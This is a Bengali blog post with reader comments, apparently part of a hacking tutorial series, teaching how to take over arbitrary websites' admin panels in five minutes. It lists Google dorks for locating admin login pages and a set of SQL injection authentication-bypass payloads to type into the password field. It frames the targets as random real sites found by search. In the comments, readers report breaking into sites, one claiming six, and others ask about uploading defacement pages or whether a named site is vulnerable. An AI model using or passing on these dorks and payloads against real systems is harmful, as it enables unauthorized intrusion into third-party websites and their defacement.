আসসালামু আলাইকুম, সবাইকে আজকের পোষ্টে আবারও স্বাগতম। কেমন আছেন সবাই? আশা করি সবাই মহান আল্লাহ তায়ালার অশেষ রহমতে আশা-পাশের সবাইকে নিয়ে খুবই ভাল আছেন। ভাল থাকুন ও ভাল রাখুন আপনার পাশের মানুষটিকে।
হ্যাকিং নিয়ে ধারাবাহিক পর্বগুলো দেখেনঃ
- !i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১
- i!i!i!i! কিভাবে RapidShare ক্র্যাক করবেন i!i!i!i! পর্ব- ২
- মাত্র ৫ মিনিটে একটি ওয়েবসাইট হ্যাকিং করুন (মেগা পোষ্ট) পর্ব- ৩
- আবারও হ্যাকিং করুন ওয়েব সাইট!!! এবারেরটা কতক্ষণ? ১০ মিনিটও লাগবে না | পর্ব- ৪
- XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব- ৫
- …::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬
- IIS Exploit সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল (উইন্ডোজ ৭) | পর্ব-৭
- ®¤Θ RTE হ্যাকিং টিউটোরিয়াল, হ্যাকিং করতে মাত্র কয়েকমিনিট সময় নেন ®¤Θ | পর্ব-৮
শিরোনাম দেখেই আশা করি বুঝে গেছেন পোষ্টটি কি নিয়ে ? জ্বী, ঠিকই ধরেছেন। আজ দেখাব মাত্র ৫ মিনিটে কিভাবে একটি ওয়েবসাইট বস্কাইয়া (হ্যাকিং) দিতে হয়। খুবই মজা হবে। আমার মনে হয় উৎসুক জনতা এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে। পোষ্ট তো করেই যাচ্ছি কিন্তু মন্তব্যই পাই না। দেখা যায় যে একটা পোষ্ট করার কিছুক্ষণ পর দেখা যায় ৩০০-৪০০ জন ভিজিটর পড়ে ফেলেছে। কিন্তু ঐ সময় দেখা যায় মন্তব্য এসেছে ১, ২ বা ৫টা। এই ভাবে চললে লিখতে কার ভাল লাগে। আপনাদের তো আর বলি না লিখতে পোষ্টটি পড়ে সব শিখ ফেলেছেন কিন্তু এরপর কাজটাও সেরে ফেলেছেন। কিন্তু কিন্তু একটা মন্তব্য করার মতো আর সময় পেলেন না। এই জন্যই আমরা বাঙ্গলী। যাক চলুন পোষ্টে……….। শিখে ফেলি কিভাবে ৫ মিনিটে একটা ওয়েবসাইট হ্যাকিং করতে হয়।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।
- প্রথমে আমরা যাব www.google.com এ।
- এবার Search বক্সে যে কোন একটি Google dork লিখুন।
- আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
- এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
- যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel
username :
password :
- এখানে ইউজার নেম দিনঃ “Admin”
- তাহলে পাসওয়ার্ড কি দিবেন ? সমস্যা নাই আমিও নাই :P
- নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
- তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
password:'or'1'='1
- এবার submit এ ক্লিক করুন।
- ব্যস কাজ শেষ আপনি এখন রাজা যদি ছেলে হন আর মেয়ে হলে রাণী :P
খোব০ বাল joos জোস বলো লাগা
চরম হইচে অপু !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ধন্যবাদ
http://www.amadershomoy1.com/admin/login.php
এই পেজটা কি vulnerable নাকি Not -vulnerable ?
জানাবেন?
আগে থেকে জানি! সেআর করার জন্য ধন্যবাদ!
আপনাকেও ধন্যবাদ
ধন্যবাদ ধন্যবাদ ধন্যবাদ।জীবনে অনেক হ্যাকিং এর টিউন পরছি কিন্তু কাজে লাগাইতে পারি নাই।আজ এইটা কাজে লাগছে।অনেক খুশি লাগতেছে।Defece page কিভাবে upload করবো??
আপনাকেও ধন্যবাদ।
20 মিনিট চেষ্টা করে পারিনাই। পরে আবার চেষ্টা করবো। ধন্যবাদ !!!!!!!!!!!!!!!!!!!
অনেকেই পেরেছে। আপনিও পারবেন আশা করি আমিও। হয়ত কোথাও সমস্যা হয়েছে। আপনাকেও ধন্যবাদ
বড় ভাই আপনি তো আমাকে হাচ্কের বানাইলেন… পরে সমসা হলে আপনি দায়ী হে হে প্রিয়তে রাখলাম
ধন্যবাদ মন্তব্যের জন্য। তবে কারও ক্ষতি করার উদ্দেশ্যে হ্যাকিং করবেন না। সব সময় ভাল উদ্দেশ্যে হ্যাকিং করুন।
সেই T.T তে যখন সদস্য হয়েছিলাম তখন থেকেই আপনার পোসট গুলো নিরবে পড়তাম। কখনো মনেহয় আপনার কোন পোসট এ মনতব্য করা হয়নি। আমার এতদিনের মোট মনতব্য ২-৪ টার বেশি না। আজ আর চুপ থাকতে পারলাম না। সততি জাদু দেখালেন আপনি।
সব থেকে বড় কথা আপনাদের এই হাক্যিং এর পোসট গুলো পড়তে পড়তে কখন যে মনের ভিতোর হ্যাকার হওয়ার ইচছা জেগে উঠলো তা আমি নিজেও জানিনা। বিশেষ করে আপনি, পুদিনা পাতা ভাই, স্ক্রিপ্ট কিডি ভাই যে পোসট গুলো করেন তা আমার খুব ভাল লাগে। এখন তো আমি রিতিমত প্রত্যেকদিন হ্যাকিং এর প্রাকটিস করছি।
আর আপনার এই পোস্ট টা দিয়ে আমি ৬ টা সাইট সফল ভাবে হ্যাক করেছি।
অন্তর থেকে ধন্যবাদ আপনাকে. আমি একটা firefox add on ইউস এর জন্য আপনার সাহায্য চাই. দয়াকরে আপনার ইমেল টা জানাবেন তাহলে আমি আপনার ইমেল এ add on টা সম্পর্কে বিস্তারিত জানাব. আমার ইমেল [email protected]
আপনার মন্তব্যের জন্য আপনাকে অনেক ধন্যবাদ। আশা করি এখন থেকে নিয়মিত মন্তব্য করে টিউনারপেজের টিজেদের উৎসাহিত করবেন। আমার ইমেইল আইডি হলঃ [email protected]
কোন সমস্যা হলে একটা মেইল করবেন। ধন্যবাদ, টিউনারপেজর সাথেই থাকুন :)
আসলে যত সহজে পড়তে পারি করতে পারিনা , তবে এটি পারব মনে হচ্ছে । ধন্যবাদ সেয়ার করার জন্য ।
আপনাকেও ধন্যবাদ ইয়াসিন ভাই। এবার চেষ্টা করে দেখুন পারবেন ইনশাআল্লাহ
ভাই আপনারে আল্লাহ কি দিয়া বানাইসে জানতে বড় ইসসা হয় …পারলে আপনার ব্রেন তা hack করতাম ………রিয়াল্লি ফাটাইয়া দিসেন ………..
আরে দূর মিয়া। যত্তসব কথাবার্তা। আসলে আপনার কাছে আর কোন মন্তব্য ছিলো না? :P
আল্লাহ আমারে মাটি দিয়ে তৈরে করেছে। আর আমি আপনাদের মতোই একজন সাধারণ পাবলিক।
আপনাকে ধন্যবাদ :)
আপনে wellcome ….ভাই আমি পার্সি ……অনেক ধন্যবাদ
@অনির্বাচিত টিউনার ভাইয়া,গুগল ডক সম্পরকে ভালো কিছু জানি না।গুগল ডক নিয়ে একটা পোস্ট করলে আমাদের জন্য খুব ভালো হত।
আসলে আপনি যে সাইট হ্যাকিং করতে চান, সেই সেই সব ওয়েবসাইট সহজে বের করতেই গুগল ডক ব্যবহার করা হয়। ধরুন ভিকটিমের সাইট সহজে বেব করার জন্যই গুগল ডক ব্যবহৃত হয়ে থাকে। আপনি আমার http://www.tunerpage.com/archives/20069 এই পোষ্টটি পড়ে দেখতে পারেন। আপনাকে ধন্যবাদ
হে হে হে আমি পারছি……ইয়াহুউউউউ…………
আপনাকে একটা জঘন্য ধন্যবাদ!!
আপনাকেও আমার পক্ষ থেকে ভৌতিক জঘন্য ধন্যবাদ। :)
দয়া করে ক্ষতি করবেন কারও
ভাইযান আপনে এইটা কি লিখলেন……”দয়া করে ক্ষতি করবেন কারও”
সবাইরে বললেন “দয়া করে ক্ষতি করবেন না কারও” আর আমারে বললেন “দয়া করে ক্ষতি করবেন কারও”
আমারে দেইখা আপনার কি মনে হয়?আমি সবার ক্ষতি করে বেরাই?!!
যাই হোক…কি আর করার বড়দের কথা শুনতে হয়……!!
হে হে হে……
আসলে প্রিন্ট মিসটেক :P আসলে হ্যাকিং শিখে রাখা ভাল। কিন্তু এর দ্বারা কারও ক্ষতি করা ভাল না।
ভুলের জন্য আমি ক্ষমা প্রার্থী। ভাল থাকুন ও ভাল রাখুন পাশের মানুষটিকে।
টিউনারপেজের সাথেই থাকুন, ধন্যবাদ
‘ভাল থাকুন ও ভাল রাখুন পাশের মানুষটিকে।’——-
আপনার এই ডায়লগটা একদম বীভৎস……
হি হি হি…
ভাই চরম হইসে…………………চালাইয়া জান…………….
আর কালকের পষ্টের জন্য অপেক্ষায় রইলাম।
ভাই কালকের পোস্ট টা কিসের উপর????????????????????
পোষ্ট অলরেডি পাবলিশ হয়েই গেছে। পড়ে দেখেন। আপনাকেও ধন্যবাদ, সাথেই থাকুন
darun tips. but ame try kore nai. karon ame atai jane na ke kora busta parboo eakta site ar error acha kina? Thanks apnaka.
কিভাবে বুঝবেন যে একটা সাইটে ইরর আছে ? আপনি পোষ্টটি ভাল করে আরেকবার পড়ে দেখুন স্যার
আপনি গুগল ডক একটা দিয়ে গুগলে সার্চ দিন। তাহলে গুগলই আপনাকে বের করে দেব। আপনাকেও ধন্যবাদ
অনির্বাচিত টিউনার ভাই চিন্তা করছি আগামিবার নির্বাচনে আপনাকে দাড়া করিয়ে দিয়ে নির্বাচিত করব । আপনার টিউনটা খুব সুন্দর হয়েছে । অনেকেই সফল হয়েছে (কিন্তু আমি ব্যর্থ) তাই খুব ভাল লাগছে । আশা করি আপনার কাছ থেকে আরও অনেক কিছু শিখতে পারব । ধন্যবাদ টিউনটি করার জন্য ।
আবার চেষ্টা করুন। আসলে মূল ব্যাপারটা হল সিকিউরিটি। যে সব ওয়েবসাইটের সিকিউরিটিতে সমস্যা সেগুলো শুধু যাবে।
আবার চেষ্টা করুন। অনেকেই যেহেতু পেরেছে আপনিও আশা করি পারবেন ই। আর আমি নির্বাচনে দাঁড়ানোর কোন ইচ্ছাই নেই :P
আপনাদের আরও উপহার দিতে চেষ্টা করব। কালকের পোষ্টের জন্য অপেক্ষা করুন।
আপনাকেও অনেক ধন্যবাদ :)
অবশ্যই, আপনার কালকের পোস্ট এর অপেক্ষায় রইলাম । :D আর আপনি কি ফেসবুকে অনলাইন হোন না ?
আমি ফেইসবুকে সব সময়ই অফলাইনে থাকি? কেন ? সমস্যা হলে ম্যাসেজ করিয়েন। ভাল থাকবেন।
আসলে আপনাকে কখনও অনলাইনে পাইনি তো তাই । আর সমস্যা হলে অবশ্যই ম্যাসেজ করব । আর আমার মূলত কোন ফেসবুক আইডি নেই । মাঝে মাঝে বোনের আইডিতে বসি । আপনি হয়ত চিনবেন নাম Rajani Akter । ধন্যবাদ ।
এক কথায়, যা সাধারণ নয়= অসাধারণ।
আপনাকে একটা সাধারণ নয়= অসাধারণ ধন্যবাদ :)
পুরাই পাঙ্খা !
এইবার এইবার অনির্বাচিত টিউনার ভাইরে ধরছি, তার সাইট আগে হ্যাক করি :P
সাবাস, পারলে এক্ষুনি করে ফেলেন। :)
খারান, আইতেছি ;)
অনেক try করলাম but হলো না…….
আরেকটু কষ্ট করে চেষ্টা করুন। হয়ত কোথাও ভুল করেছেন। ধন্যবাদ
ফাটাফাটি! অসংখ্য ধন্যবাদ।
আপনাকেও অসংখ্য ধন্যবাদ ফাহিম ভাই :)
অনেক গুলো সাইটে চেষ্টা করলাম কিন্তু পারলামনা। মনে হয় আমার ই ব্যার্থতা যেহেতু অনেকেই পারছেন। তাই আবার চেষ্টা করবো। আর পাসওয়ার্ড কিন্তু এমন দেখায় না password:’or’1’=’1 সেটা গোল বল হয়ে থাকে।
ব্যর্থতা মনে করেন কেন? আসলে প্রত্যেকটি সাইটই vulnerable না। তাই কষ্ট করে খুঁজতে হবে। পারবেনই, আশা করি।
আর পাসওয়ার্ডের এখানে তো আমি ঠিকই দেখতেছি। আর আপনি লগইন স্ক্রীণে এসে, উপরের যেকোন একটি SQL ইঞ্জেকশান দিবেন। তাহলেই পারবেন। ধন্যবাদ :)